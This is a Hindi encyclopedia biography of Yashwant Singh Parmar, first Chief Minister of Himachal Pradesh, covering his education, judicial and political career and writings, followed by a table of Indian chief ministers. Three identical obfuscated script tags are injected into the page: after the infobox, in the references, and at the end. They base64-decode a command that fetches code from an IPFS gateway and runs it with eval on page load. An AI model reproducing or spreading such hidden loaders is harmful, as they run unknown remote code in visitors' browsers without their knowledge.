यशवंत सिंह परमार

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
यशवंत सिंह परमार
यशवंत सिंह परमार
पूरा नाम यशवंत सिंह परमार
जन्म 4 अगस्त, 1906
जन्म भूमि चनालग गांव, जिला सिरमौर, हिमाचल प्रदेश
मृत्यु 2 मई, 1981
मृत्यु स्थान शिमला, हिमाचल प्रदेश
संतान चार
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ, हिमाचल प्रदेश के प्रथम मुख्यमंत्री
पार्टी भारतीय राष्ट्रीय काँग्रेस
पद मुख्यमंत्री, हिमाचल प्रदेश

प्रथम बार- 8 मार्च 1952 से 31 अक्टूबर 1956
दूसरी बार- 1 जुलाई 1963 से 28 जनवरी 1977

शिक्षा एम.ए., एल.एल.बी. तथा समाजशास्त्र में पी.एच.डी.
विद्यालय लखनऊ
विशेष योगदान आपने हिमाचल प्रदेश को अस्तित्व में लाने तथा विकास की आधारशिला रखने में महत्वपूर्ण योगदान दिये।
उत्तराधिकारी ठाकुर राम लाल
अन्य जानकारी डॉ. यशवंत सिंह परमार ने सिरमौर रियासत में 11 सालों तक सब जज और 1930 से 1937 तक मैजिसट्रेट के बाद जिला और 1938 से 1941 तक सत्र न्यायधीश के रूप में अपनी सेवाए दीं।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>यशवंत सिंह परमार (अंग्रेज़ी: Yashwant Singh Parmar, जन्म- 4 अगस्त, 1906; मृत्यु- 2 मई, 1981) भारत के राजनेता और एक स्वतंत्रता-संग्राम सेनानी थे। वे हिमाचल प्रदेश के प्रथम मुख्यमंत्री बने थे। उन्हे ‘हिमाचल निर्माता’ के नाम से जाना जाता है। उन्होने हिमाचल प्रदेश को अस्तित्व में लाने तथा विकास की आधारशिला रखने में महत्वपूर्ण योगदान दिये। लगभग 3 दशकों तक कुशल प्रशासक के रूप में जन-जन की भावनाओं संवेदनाओं को समझते हुए उन्होने प्रगति के पथ पर चलते हुए हिमाचल प्रदेश के विकास के लिए नई दिशाएं पेश की। उन्होने अपना सारा जीवन प्रदेश की जनता के लिए समर्पित कर दिया। वे गरीबों और जरुरतमंदों की सहायता करने के लिए हमेशा तत्पर रहते थे।[1]

परिचय

डॉ. यशवंत सिंह परमार का जन्म 4 अगस्त, 1906 को सिरमौर जिले के चनालग गांव में हुआ था। हिमाचल निर्माता डॉ. वाई. एस. परमार के पोते व पूर्व कांग्रेसी विधायक कुश परमार के बेटे चेतन परमार बीजेपी में शामिल हैं।

शिक्षा

डॉ. यशवंत सिंह परमार ने 1928 में बी.ए. आनर्स किया और इसके बाद उन्होंने लखनऊ से एम.ए. और एल.एल.बी. तथा 1944 में समाजशास्त्र में पी. एच. डी. की उपाधि ग्रहण की। सन 1929 से 1930 तक वे थियोसोफिकल सोसायटी के सदस्य रहे।

कॅरियर

  • डॉ. यशवंत सिंह परमार ने सिरमौर रियासत में 11 सालों तक सब जज और 1930 से 1937 तक मैजिसट्रेट के बाद जिला और 1938 से 1941 तक सत्र न्यायधीश के रूप में अपनी सेवाए दीं।
  • उन्होंने अपनी नौकरी की परवाह किए बिना ही सुकेत सत्याग्रह प्रजामण्डल से जुड़े गए और उनके ही प्रयासों से यह सत्याग्रह सफल हो पाया।
  • 1943 से 1946 तक वे सिरमौर एसोसिएशन के सचिव रहे।
  • 1946 से 1947 तक हिमाचल हिल स्टेट कांउसिल के प्रधान रहे।
  • 1947 से 1948 तक सदस्य आल इन्डिया पीपुलस कान्फ्रेस एवं प्रधान प्रजामण्डल सिरमौर संचालक सुकेत आन्दोलन से जुड़े रहे।
  • डॉ. परमार के प्र्यत्त्न से ही 15 अप्रैल 1948 को 30 सियासतों के विलय के बाद हिमाचल प्रदेश बन पाया और 25 जनवरी 1971 को इस प्रदेश को पूर्ण राज्य का दर्जा मिला।[1]
  • 1948 से 1952 वह सदस्य सचिव हिमाचल प्रदेश चीफ एडवाजरी काउंसिल रहे।
  • 1948 से 1964 यशवंत सिंह परमार अध्यक्ष हिमाचल कांग्रेस कमेटी रहे।
  • 1952 से 1956 तक हिमाचल प्रदेश के मुख्यमंत्री रहे।
  • 1957 सांसद बने और 1963 से 24 जनवरी 1977 तक हिमाचल के मुख्यमंत्री पद पर कार्य किया।

पुस्तक

डॉ. यशवंत सिंह परमार सिंह एक अच्छे लेखक भी थे। उन्होने ने 'पालियेन्डरी इन द हिमालयाज', 'हिमाचल पालियेन्डरी इटस शेप एण्ड स्टेटस', 'हिमाचल प्रदेश केस फार स्टेटहुड' और 'हिमाचल प्रदे्श एरिया एण्ड लेगुएजिज' नामक शोध आधारित पुस्तकें भी लिखीं।[1]

मृत्यु

डॉ. यशवंत सिंह परमार की 2 मई, 1981 में मृत्यु हो गई।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 डॉ॰ यशवंत सिंह परमार की जीवनी (हिंदी) jivanihindi.com। अभिगमन तिथि: 03 जुलाई, 2023।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>